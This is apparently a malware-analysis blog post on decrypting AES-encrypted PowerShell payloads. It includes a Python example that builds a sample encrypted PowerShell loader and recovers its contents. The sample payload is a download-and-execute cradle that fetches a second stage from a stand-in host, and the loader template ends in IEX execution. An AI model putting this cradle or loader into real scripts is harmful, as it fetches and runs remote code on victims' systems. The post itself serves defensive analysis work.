PowerShell scripts are often used to deliver malicious payloads: shellcode, another PowerShell script, a reflective DLL, and so on. You have probably encountered malicious scripts with an encrypted payload, for example one encrypted with AES. In a video I created, I show how to decrypt a typical encrypted payload with my tools base64dump and translate. The command I use in the video is:
The content of decrypt.py I use in the video is here:
This small script uses crypto functions from pycryptodome. If you want to try it for yourself, I shared the example PowerShell script on pastebin.
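The following is an added example, not the decrypt.py from the video or the pastebin script: it shows the same idea in stand-alone Python, using pycryptodome for the AES primitive. A loader in the shape these scripts commonly take (a base64 key, a base64 blob of IV followed by ciphertext, AesManaged in CBC mode with PKCS7 padding) is constructed in the block itself so it runs offline; the key, IV, payload string and variable names are all assumptions. The useful part for a practitioner is the extraction and the padding check: a wrong key or IV almost always surfaces as invalid PKCS7 padding, which is the first thing to look at when the output is garbage.

```python
import base64
import re

# pycryptodome supplies the AES primitive; the extraction and padding
# helpers below work without it, so this still imports if it is absent.
try:
    from Crypto.Cipher import AES
    HAVE_PYCRYPTODOME = True
except ImportError:
    HAVE_PYCRYPTODOME = False

BLOCK = 16

# --- constructed sample, not a real malware sample ---
SAMPLE_KEY = bytes(range(32))             # assumed AES-256 key, fixed for a deterministic run
SAMPLE_IV = bytes(range(100, 116))        # assumed IV, prepended to the ciphertext
SAMPLE_PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    """Strip PKCS7 padding; a wrong key or IV usually shows up here as invalid padding."""
    if not data or len(data) % BLOCK:
        raise ValueError("ciphertext length is not a multiple of the block size")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS7 padding (wrong key or IV?)")
    return data[:-n]


def build_sample_script(key: bytes, iv: bytes, payload: bytes) -> str:
    """Emit a PowerShell loader in a common shape: base64 key, base64 IV||ciphertext, AES-CBC/PKCS7."""
    blob = iv + AES.new(key, AES.MODE_CBC, iv=iv).encrypt(pkcs7_pad(payload))
    b64 = lambda b: base64.b64encode(b).decode()
    return (
        f"$k = [Convert]::FromBase64String('{b64(key)}')\n"
        f"$d = [Convert]::FromBase64String('{b64(blob)}')\n"
        "$a = New-Object System.Security.Cryptography.AesManaged\n"
        "$a.Mode = [System.Security.Cryptography.CipherMode]::CBC\n"
        "$a.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7\n"
        "$a.Key = $k\n"
        "$a.IV = $d[0..15]\n"
        "$p = $a.CreateDecryptor().TransformFinalBlock($d, 16, $d.Length - 16)\n"
        "IEX ([Text.Encoding]::UTF8.GetString($p))\n"
    )


B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def extract_base64_blobs(script: str) -> list:
    """Return the decoded FromBase64String() arguments in order of appearance."""
    return [base64.b64decode(m) for m in B64_RE.findall(script)]


def decrypt_loader(script: str) -> bytes:
    """Recover the payload: the 16/24/32-byte blob is the key, the longest other blob is IV||ciphertext."""
    blobs = extract_base64_blobs(script)
    sized = [b for b in blobs if len(b) in (16, 24, 32)]
    if len(sized) != 1:
        raise ValueError(f"expected exactly one AES-sized blob, found {len(sized)}")
    aes_key = sized[0]
    data = max((b for b in blobs if b is not aes_key), key=len)
    iv, ct = data[:BLOCK], data[BLOCK:]
    return pkcs7_unpad(AES.new(aes_key, AES.MODE_CBC, iv=iv).decrypt(ct))


SAMPLE_SCRIPT = build_sample_script(SAMPLE_KEY, SAMPLE_IV, SAMPLE_PAYLOAD) if HAVE_PYCRYPTODOME else None

if __name__ == "__main__":
    print(decrypt_loader(SAMPLE_SCRIPT).decode())
```

Real loaders vary in where the IV lives (prepended, hard-coded, or derived from the key) and in how the key is obfuscated, so treat the blob-size heuristic in decrypt_loader as a starting point and confirm the recovered plaintext actually looks like PowerShell before trusting it.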
Didier Stevens (DidierStevens, 546 Posts, ISC Handler) | Nov 30th 2020
Comment from Anonymous, Nov 30th 2020:
Nicely done, thank you.